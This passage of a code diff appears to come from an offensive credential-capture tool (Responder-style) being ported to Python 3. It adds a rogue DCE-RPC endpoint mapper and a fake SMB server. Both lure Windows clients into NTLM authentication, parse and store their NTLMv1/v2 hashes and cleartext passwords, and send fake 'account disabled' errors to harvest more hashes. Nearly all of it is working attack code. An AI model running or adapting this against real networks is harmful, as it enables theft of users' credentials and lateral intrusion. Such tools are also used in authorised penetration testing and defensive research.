+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to LSARPC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == SAMR:
+					x = RPCMapBindMapperAns(Tower1UID=SAMR, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to SAMR auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == SRVSVC:
+					x = RPCMapBindMapperAns(Tower1UID=SRVSVC, Tower1Version="\x03\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to SRVSVC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == WKSSVC:
+					x = RPCMapBindMapperAns(Tower1UID=WKSSVC, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to WKSSVC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == WINSPOOL:
+					x = RPCMapBindMapperAns(Tower1UID=WINSPOOL, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to WINSPOOL auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == WINREG:
+					x = RPCMapBindMapperAns(Tower1UID=WINREG, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to WINREG auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == SVCCTL:
+					x = RPCMapBindMapperAns(Tower1UID=SVCCTL, Tower1Version="\x02\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to SVCCTL auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == ATSVC:
+					x = RPCMapBindMapperAns(Tower1UID=ATSVC, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to ATSVC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == DNSSERVER:
+					x = RPCMapBindMapperAns(Tower1UID=DNSSERVER, Tower1Version="\x05\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to DNSSERVER auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == NETLOGON:
+					# Don't redirect NETLOGON for now - we want NTLM not SecureChannel
+					self.request.close()
+					return
+				
+				# Try to receive more data
+				try:
+					data = self.request.recv(2048)
+					if data and FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+						ParseRPCHash(data, self.client_address[0], Challenge)
+						print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (name or "unknown interface", self.client_address[0].replace("::ffff:", "")), 3, 1))
+				except:
+					pass
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DCE-RPC] Exception in RPCMap: %s' % str(e)))
+			pass
+		finally:
+			try:
+				self.request.close()
+			except:
+				pass
+
+
+class RPCMapper(BaseRequestHandler):
+	"""RPCMapper handler - Handles actual RPC service connections"""
+	
+	def handle(self):
+		try:
+			data = self.request.recv(2048)
+			if not data:
+				return
+			
+			self.request.settimeout(3)
+			Challenge = RandomChallenge()
+			
+			# Look for NTLMSSP NEGOTIATE
+			if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
+				n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+				n.calculate()
+				RPC = RPCNTLMNego(Data=n)
+				RPC.calculate()
+				self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+				
+				# Wait for NTLMSSP AUTH
+				data = self.request.recv(2048)
+			
+			# Look for NTLMSSP AUTH
+			if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+				ParseRPCHash(data, self.client_address[0], Challenge)
+				print(color("[*] [DCE-RPC Mapper] NTLM authentication from %s" % self.client_address[0].replace("::ffff:", ""), 3, 1))
+			
+			# Check if this is a BIND with auth
+			elif data[0:3] == b"\x05\x00\x0b":
+				uuid, name = FindInterfaceUUID(data)
+				if name and settings.Config.Verbose:
+					print(text('[DCE-RPC Mapper] Connection for %s from %s' % (name, self.client_address[0].replace("::ffff:", ""))))
+				
+				# Check for NTLMSSP in BIND
+				if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
+					n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					n.calculate()
+					RPC = RPCNTLMNego(Data=n)
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					
+					data = self.request.recv(2048)
+					if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+						ParseRPCHash(data, self.client_address[0], Challenge)
+						print(color("[*] [DCE-RPC Mapper] NTLM authentication on %s from %s" % (name or "unknown interface", self.client_address[0].replace("::ffff:", "")), 3, 1))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DCE-RPC Mapper] Exception: %s' % str(e)))
+			pass
+		finally:
+			try:
+				self.request.close()
+			except:
+				pass

servers/SMB.py

@@ -14,12 +14,15 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct, re
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from random import randrange
 from packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData, SMB2Header, SMB2NegoAns, SMB2Session1Data, SMB2Session2Data
-from SocketServer import BaseRequestHandler
-from utils import *
-import struct
-import re
 
 
 def Is_Anonymous(data):  # Detect if SMB auth was Anonymous
@@ -43,30 +46,25 @@ def Parse_Nego_Dialect(data):
 		if Dialect[i] == 'NT LM 0.12':
 			return chr(i) + '\x00'
 
-
 def midcalc(data):  #Set MID SMB Header field.
     return data[34:36]
 
-
-
 def uidcalc(data):  #Set UID SMB Header field.
     return data[32:34]
 
-
 def pidcalc(data):  #Set PID SMB Header field.
     pack=data[30:32]
     return pack
 
-
 def tidcalc(data):  #Set TID SMB Header field.
     pack=data[28:30]
     return pack
 
 def ParseShare(data):
 	packet = data[:]
-	a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
+	a = re.search(b'(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
 	if a:
-		print text("[SMB] Requested Share     : %s" % a.group(0).decode('UTF-16LE'))
+		print(text("[SMB] Requested Share     : %s" % a.group(0).decode('UTF-16LE')))
 
 def GrabMessageID(data):
     Messageid = data[28:36]
@@ -74,8 +72,8 @@ def GrabMessageID(data):
 
 def GrabCreditRequested(data):
     CreditsRequested = data[18:20]
-    if CreditsRequested == "\x00\x00":
-       CreditsRequested =  "\x01\x00"
+    if CreditsRequested == b'\x00\x00':
+       CreditsRequested =  b'\x01\x00'
     else:
        CreditsRequested = data[18:20]
     return CreditsRequested
@@ -89,23 +87,25 @@ def GrabSessionID(data):
     return SessionID
 
 def ParseSMBHash(data,client, Challenge):  #Parse SMB NTLMSSP v1/v2
-        SSPIStart  = data.find('NTLMSSP')
-        SSPIString = data[SSPIStart:]
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
 	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
 	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
-	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
 	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
 	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
 
 	if NthashLen == 24:
-		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
 		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
 		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
 		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
 		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
 		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
 		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, Challenge.encode('hex'))
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
 
 		SaveToDb({
 			'module': 'SMB', 
@@ -117,14 +117,15 @@ def ParseSMBHash(data,client, Challenge):  #Parse SMB NTLMSSP v1/v2
 		})
 
 	if NthashLen > 60:
-		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
 		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
 		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
 		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
 		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
 		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
 		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), SMBHash[:32], SMBHash[32:])
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
 
 		SaveToDb({
 			'module': 'SMB', 
@@ -135,43 +136,17 @@ def ParseSMBHash(data,client, Challenge):  #Parse SMB NTLMSSP v1/v2
 			'fullhash': WriteHash,
 		})
 
-
-def ParseSMB2NTLMv2Hash(data,client, Challenge):  #Parse SMB NTLMv2
-    SSPIStart = data[113:]
-    data = data[113:]
-    LMhashLen = struct.unpack('<H',data[12:14])[0]
-    LMhashOffset = struct.unpack('<H',data[16:18])[0]
-    LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-    NthashLen = struct.unpack('<H',data[22:24])[0]
-    NthashOffset = struct.unpack('<H',data[24:26])[0]
-    SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-    DomainLen = struct.unpack('<H',data[30:32])[0]
-    DomainOffset = struct.unpack('<H',data[32:34])[0]
-    Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
-    UserLen      = struct.unpack('<H',data[38:40])[0]
-    UserOffset   = struct.unpack('<H',data[40:42])[0]
-    Username     = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-    WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), SMBHash[:32], SMBHash[32:])
-    SaveToDb({
-                'module': 'SMBv2', 
-		'type': 'NTLMv2-SSP', 
-		'client': client, 
-		'user': Domain+'\\'+Username, 
-		'hash': SMBHash, 
-		'fullhash': WriteHash,
-             })
-
 def ParseLMNTHash(data, client, Challenge):  # Parse SMB NTLMv1/v2
 	LMhashLen = struct.unpack('<H',data[51:53])[0]
 	NthashLen = struct.unpack('<H',data[53:55])[0]
 	Bcc = struct.unpack('<H',data[63:65])[0]
-	Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
+	Username, Domain = tuple([e.decode('latin-1') for e in data[89+NthashLen:Bcc+60].split(b'\x00\x00\x00')[:2]])
 
 	if NthashLen > 25:
-		FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
+		FullHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex')
 		LmHash = FullHash[:32].upper()
 		NtHash = FullHash[32:].upper()
-		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), LmHash, NtHash)
+		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), LmHash.decode('latin-1'), NtHash.decode('latin-1'))
 	
 		SaveToDb({
 			'module': 'SMB', 
@@ -183,10 +158,9 @@ def ParseLMNTHash(data, client, Challenge):  # Parse SMB NTLMv1/v2
 		})
 
 	if NthashLen == 24:
-		NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
-		LmHash = data[65:65+LMhashLen].encode('hex').upper()
-		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, Challenge.encode('hex'))
-
+		NtHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex').upper()
+		LmHash = codecs.encode(data[65:65+LMhashLen],'hex').upper()
+		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash.decode('latin-1'), NtHash.decode('latin-1'), codecs.encode(Challenge,'hex').decode('latin-1'))
 		SaveToDb({
 			'module': 'SMB', 
 			'type': 'NTLMv1', 
@@ -204,13 +178,13 @@ def IsNT4ClearTxt(data, client):
 		WordCount = data[HeadLen]
 		ChainedCmdOffset = data[HeadLen+1]
 
-		if ChainedCmdOffset == "\x75":
+		if ChainedCmdOffset == "\x75" or ChainedCmdOffset == 117:
 			PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
 
 			if PassLen > 2:
 				Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
 				User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
-				print text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
+				print(text("[SMB] Clear Text Credentials: %s:%s" % (User,Password)))
 				WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
 
 
@@ -221,13 +195,13 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 			while True:
 				data = self.request.recv(1024)
 				self.request.settimeout(1)
-                                Challenge = RandomChallenge()
+				Challenge = RandomChallenge()
 
 				if not data:
 					break
 
-				if data[0] == "\x81":  #session request 139
-					Buffer = "\x82\x00\x00\x00"
+				if data[0:1] == b"\x81":  #session request 139
+					Buffer = b"\x82\x00\x00\x00"
 					try:
 						self.request.send(Buffer)
 						data = self.request.recv(1024)
@@ -235,81 +209,86 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 						pass
 
                                 ##Negotiate proto answer SMBv2.
-				if data[8:10] == "\x72\x00" and re.search("SMB 2.\?\?\?", data):
-              				head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
-            				t = SMB2NegoAns()
-         				t.calculate()
-        				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-      				        self.request.send(buffer1)
-      				        data = self.request.recv(1024)
-                                ## Session Setup 1 answer SMBv2.
-				if data[16:18] == "\x00\x00" and data[4:5] == "\xfe":
-              				head = SMB2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
-              				t = SMB2NegoAns(Dialect="\x10\x02")
-              				t.calculate()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-                                ## Session Setup 2 answer SMBv2.
-				if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
-              				head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID=GrabSessionID(data),NTStatus="\x16\x00\x00\xc0")
-              				t = SMB2Session1Data(NTLMSSPNtServerChallenge=Challenge)
-              				t.calculate()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-                                ## Session Setup 3 answer SMBv2.
-				if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02" and data[4:5] == "\xfe":
-              				ParseSMB2NTLMv2Hash(data, self.client_address[0], Challenge)
-              				head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data))
-              				t = SMB2Session2Data()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-
-                                # Negotiate Protocol Response smbv1
-				if data[8:10] == "\x72\x00" and data[4:5] == "\xff" and re.search("SMB 2.\?\?\?", data) == None:
-				        Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
-					Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
-					Body.calculate()
-		
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
+				if data[8:10] == b"\x72\x00" and re.search(rb"SMB 2.\?\?\?", data):
+					head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
+					t = SMB2NegoAns()
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
 					data = self.request.recv(1024)
 
-				if data[8:10] == "\x73\x00" and data[4:5] == "\xff":  # Session Setup AndX Request smbv1
+                                ## Nego answer SMBv2.
+				if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe":
+					head = SMB2Header(MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'))
+					t = SMB2NegoAns(Dialect="\x10\x02")
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+                                ## Session Setup 2 answer SMBv2.
+				if data[16:18] == b"\x01\x00" and data[4:5] == b"\xfe":
+					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), SessionID=GrabSessionID(data).decode('latin-1'),NTStatus="\x16\x00\x00\xc0")
+					t = SMB2Session1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+                                ## Session Setup 3 answer SMBv2.
+				if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe':
+					ParseSMBHash(data, self.client_address[0], Challenge)
+					if settings.Config.ErrorCode:
+						ntstatus="\x6d\x00\x00\xc0"
+					else:
+						ntstatus="\x22\x00\x00\xc0"
+					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus=ntstatus, SessionID=GrabSessionID(data).decode('latin-1'))
+					t = SMB2Session2Data()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+
+                                # Negotiate Protocol Response smbv1
+				if data[8:10] == b'\x72\x00' and data[4:5] == b'\xff' and re.search(rb'SMB 2.\?\?\?', data) == None:
+					Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
+					Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
+					Body.calculate()
+		
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
+
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+					data = self.request.recv(1024)
+
+				if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff":  # Session Setup AndX Request smbv1
 					IsNT4ClearTxt(data, self.client_address[0])
 					
 					# STATUS_MORE_PROCESSING_REQUIRED
-					Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
+					Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
-						Body = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
+						Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 					else:
-						Body = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge)
+						Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 					Body.calculate()
 		
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
 
 
-					if data[8:10] == "\x73\x00" and data[4:5] == "\xff":  # STATUS_SUCCESS
+					if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff":  # STATUS_SUCCESS
 						if Is_Anonymous(data):
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
 							Body = SMBSessEmpty()
 
-							Packet = str(Header)+str(Body)
-							Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+							packet1 = str(Header)+str(Body)
+							Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-							self.request.send(Buffer)
+							self.request.send(NetworkSendBufferPython2or3(Buffer))
 
 						else:
 							# Parse NTLMSSP_AUTH packet
@@ -317,81 +296,39 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 
 							if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
 								# Send ACCOUNT_DISABLED to get multiple hashes if there are any
-								Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+								Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
 								Body = SMBSessEmpty()
 
-								Packet = str(Header)+str(Body)
-								Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+								packet1 = str(Header)+str(Body)
+								Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-								self.request.send(Buffer)
+								self.request.send(NetworkSendBufferPython2or3(Buffer))
 								self.ntry += 1
 								continue
 
 							# Send STATUS_SUCCESS
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 							Body = SMBSession2Accept()
 							Body.calculate()
 
-							Packet = str(Header)+str(Body)
-							Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+							packet1 = str(Header)+str(Body)
+							Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-							self.request.send(Buffer)
+							self.request.send(NetworkSendBufferPython2or3(Buffer))
 							data = self.request.recv(1024)
 				
 
-				if data[8:10] == "\x75\x00" and data[4:5] == "\xff":  # Tree Connect AndX Request
+				if data[8:10] == b"\x75\x00" and data[4:5] == b"\xff":  # Tree Connect AndX Request
 					ParseShare(data)
-					Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
+					Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(NetworkRecvBufferPython2or3(data)), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Body = SMBTreeData()
 					Body.calculate()
 
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
-
-				if data[8:10] == "\x71\x00" and data[4:5] == "\xff":  #Tree Disconnect
-					Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
-				if data[8:10] == "\xa2\x00" and data[4:5] == "\xff":  #NT_CREATE Access Denied.
